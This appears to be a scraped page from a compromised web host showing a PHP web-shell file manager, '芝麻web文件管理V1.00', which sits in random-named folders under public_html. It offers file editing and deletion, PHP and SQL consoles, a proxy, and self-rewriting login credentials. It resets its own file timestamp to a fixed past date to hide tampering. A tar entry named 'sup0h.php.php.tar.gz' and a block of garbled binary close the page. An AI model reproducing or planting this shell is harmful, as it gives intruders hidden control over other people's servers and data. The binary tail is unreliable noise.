芝麻web文件管理V1.00

编辑当前文件:/home/gettoplisting/public_html/dd7e5a/h6snx5/h6snx5.tar
'; } return ' '.$str.'
'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'
'.__('Name').''.__('Value').'
'; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' '.__('File manager').'
'.__('Login').'     '.__('Password').'    
'.fm_lang_form($language).' '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = '
'.fm_home().' Url:
'; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%()%i', '$1'.''.$proxy_form, $result); echo $result; die(); } } ?> <?=__('File manager')?>
'.__('File manager').' - '.__('Settings').' '.(empty($msg)?'':''.$msg.'').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' SQL server SQL user SQL password SQL DB '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' '.__('Reset settings').'
'.__('Settings').' - '.__('Authorization').'
'.__('Login').'
'.__('Password').'
'.__('Cookie').'
'.__('Days').'
'.__('Script').'
'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?>

'.fm_run_input('php'); else echo ''.fm_run_input('sql'); ?>

'."\n"; $select .= '\n"; foreach ($tmpl as $key=>$value){ $select.='\n"; } $select .= "\n"; echo $select; } ?>
'.strtoupper($res_lng).' '.__('Result').'
'.$fun($res).'
'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?>

'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?>
:
'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' '.__('Delete') . ''; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' '.__('Delete').''; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' '.__('Delete').''; } else $msg .= __('Error occurred').': '.__('no files'); } ?>
    ,
     '.$file.''; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '     '.$file.'' : '     '.$file.''; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '' . __('Delete') . ''; $renamelink = fm_root($file) ? '' : '' . __('Rename') . ''; $rightstext = ($file=='.' || $file=='..') ? '' : '' . @fm_rights_string($filename) . ''; ?>
Github | .'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | proxy'; if (!empty($fm_config['show_phpinfo'])) echo ' | phpinfo'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | xls'; if (!empty($fm_config['fm_settings'])) echo ' | '.__('Settings').''; ?>
errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?> sup0h.php.php.tar.gz000064400000060672151032666610010327 0ustar00ْȒ(v_PTL6JS\ڀ\8Fe#5TѲX<,_^^3>l9 -M!k@ʜ7Wα%x m ?u@ȣ! uxD[0*ƣ0W/ʰANpv Wp 7ㆩpc4oJ~iR`_VUu4 `zNcx)^4{՜0413ԕ^rP"$',^GS[Pu L /)^G׀EsG1Lz7$҈ZER*~ɑ;|%w9YCE }wT|xP<9E.'/9Ne蟱YϝӦb]/\k>;!|b")rn|?ej c_9Yv3>x DHK`iu,HXpą"B Mr/bUN@.p1ht<`,c-]w8KrP*T$vQ"RPȸ6W|3}ƒ4 0r.bN&y筗L>J&R¹iEE IrP"bt[,^1&'Ҁgc\b )t+,ˋi5y8)WdG]uZ] kD+L+g%?D¤5a`0+?v`׀M`ApЀ 4`/RXv`K+0p[KV]Ӣd6JV56l@Ru8-?NnS6 eQ=9NS1q3 5v!қ"~7ބӛteEj7s RDzjY{J{xGYy- eHB[4b3KnD fgS*<aZ)(E%~KK `8E-p_EhqB+,3vp8!Bkoa&Վ'im/hi/JB9F]z-/w)59THv6mx#ըpccs*t-fPi.M>2.MS3Hڢgl]Ĩ0M5r)USϔYoUe8MC4X;L:P/6w f0[%-h.;o~9v=m Z^N R뱼% ,/PNlØ;^q@@a,L4 EiS$HOFA"6H i :T" 5n$.@I=lg0S5&/罐jgS㴵z{T}ZӇ;y V\rd GQN'+I4 U$@QEˆvE>&`Ի S)eҿ٪(Oͺp794x~;py^~Dknn{XݍH_C5D4>mYܺ懟d:·b|OuMd 4֤q PY X>h13ۜkh&Ʉ]7F2@{$S LDٍ=uٺ EɀޒYjAՔݘP.A=Ҽg|`g-xcc:}%NS"J 1ƜFiDSbט^ךt{I>Sv8nL#L~t|B5s&IhX7H>!m=?{Lrs=B[e,+ZEt 8:kK:?@c0.@sHtzɩ{9oQK>=)% cbmc:gNzX4]7.Tt0 ^ʣ 0ؤqH0hS:Ywes!%;5>hWiiOI.KfzpL%G cR[#"<O<+w^ho+ʻƷw7ǎ[Ȓ*#= @ՑW KŒ9D"T5GL@$vO8/:o4[u_aĢ`H['iI*r%((7mOoȦ`H4C"?u;!I̓ڜitQꚌ_R~ Js\'I\PLZ/#դfA'/`CmTkL1䞋V:lQm,UKr #<0LR[0LQ\*;~d,DGw|$P5ZLҪtRvr;T$2hGd2#s3~H31M b6/=b8гKi̝Hm;(ң1\Y '3bH˄=m^j/ LOJ+談EPֳXE ?]?)m7Ұ9gw<7:u!"GH]un= ꧋Z$0LNXNYʈpt FetLC+C"ꤊ:_W( hNl#DciD t['R/iү>NŽI.q`N;u5bPZq}rb$C1H㴠@ߟqQ7܏Ή GKZ3,{߮A`lԜsHxaHh4si P# Ppdc cirC{Gv^m<,Hd}@#87_+ˁ6N'KirG+t_*LSi=5UϤW.-xHFV;Jbe-E(qҨ<;%ՙ̢?Z<(6mhp(-COϹ`6Ze`^hmꪳq1 W(/m`k"Df5o.(SvwC|՜aan kC7^JGt*RCE_nS=On[^DDecqYxj)4.X`@7p",G ̞lkS?"C]MFX1ŲV?8 =uR%ߎ(8z;ra~\a=PqҔzS1g-(۲a8ZyƃdJ fG zFmY sC]==N+apV.Q~AÓgNG%Wca9aii]6=v$}Zi)*O*!sc.$.AwXfPKVKO~;F[FR}2]xe3IUAMxl醸FᭆLbxdPֹThtta~7lbU\o'_zֳVUK&.)mY.n]nٜstzaRv.9I_Єzm;fe%y-i_{c3}XӸo]N> Fqϱΐtѭ#dCWgJ: _r+44sY)p4Qn9. 6yj_ux7_ g'JBd}%x]/1]@ *ߧ<f_}N~,3 I'_/;K#m׽3g@0wAƽUE[ߏ 3 0UPY0`!J༂h yA!~f&G7>y@p!j2XeD+ x@*=[WT9Ilo fg@GR/{OCO1EWD?5.Oob5IxBG M Ֆ"r</, ;G/T1*1qi̴6G/덁פ5+@6a 5J7ALkT1q0p)=9t`z}`!lkVi=c.:} ''}4Y j`BHZH'C;VC1ۅ@8g&l%gL)9dD̑&i'*-u˞R-n*Fu?3GD`A*~0:q4Qҋ\$d%xcsZ0 e:Ҹra >Ybg`y<8m欔`+ٽ0Hf~Kb-8M[ޥ u3SbCYocfL.lFW!19it9c4B9 u>#F%s,1M{ (gJOx+b*yBAqșPO+$˕\_nt5n{̇#S_ ^0 Qcaj<7_D8e%km|w0CF`w0ԥ/ #mCyn!tuE)rp s^h 3a}r1I9Aht *>0` ~G%+r LasY}]fD:X:$q5ٕZ қS跖'@͏;XnPߢ-s(҅f8c֒͆c_beaT%tZd֒2Gu G m8;$"iA:ar/)Tzur&7x+m%ڙcB4-hu]]6cboqwc l_-GoٴE{\ ڊzNVCKUa-$X2I41T3UzխF0b %kN6(15^&L?p` -b-c$[BH젞=[3!=)ˎكҞM2 !ӈi @Ѡ$Ɋ\0jrh~2KYl>FL4dgZփ wˮwHZFxAq3Dp,KM "bz/;Hqe$VGF?4"(<w츸 r3/@4.Mf / GC'/1'<'ƣ8?f"~~ rߑ4w :In蔡4c 5 |dmF\!t Ʋf/.U_pM]D~r}ۯq/m% KlW42D)/lz\? N?a({c`ӳ,|1yДtRtLySBKVSXb$'ڱ3qaxߌ oߍo}<$\ 6'Hp7[r6B:GvSE%Ɨ۩ 3d-N`o8HE68XP8jsP`NΊz߮g?kzf~IeL L3mDTT{| _9_y0{f~=V4I? ̦}pxa4Z4xh6 b֢EX6cEB y\NW Qş8  ;F._Ì@ݎEnSA}#qYҴ~MLgF^+B"h^72L:L %:ǜe0~qXU[an5qX!W;~׽؍ygSpol=sȃPjlWŇ~/v*0NEk, mfXH9mӞcFfoUMyDy=5v&BZə|'fr)ϋ\:V Ϡ*ϵ5#a;NeRn3[iTzULvo|}]/JT.%m>S*E5|婜IeS&?[vU_T/K ykZST.K [@yEJB g|JKR3hQ遘uR\m{ST~Ķm*X4H2Rc'/ʙP)[ͥTjBL1^Sf-a<\s 